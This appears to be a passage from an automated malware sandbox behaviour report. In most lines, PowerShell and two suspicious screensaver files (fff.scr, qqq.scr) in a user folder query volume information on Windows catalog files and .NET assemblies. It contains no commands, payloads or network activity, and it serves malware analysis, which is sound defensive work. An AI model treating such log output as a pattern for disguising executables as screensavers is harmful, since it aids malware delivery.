Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\gbcd\fff.scr Queries volume information: C:\Users\gbcd\fff.scr VolumeInformation Jump to behavior
Source: C:\Users\gbcd\fff.scr Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\gbcd\fff.scr Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\gbcd\qqq.scr Queries volume information: C:\Users\gbcd\qqq.scr VolumeInformation Jump to behavior
Source: C:\Users\gbcd\qqq.scr Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\gbcd\qqq.scr Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\gbcd\qqq.scr Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\gbcd\qqq.scr Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
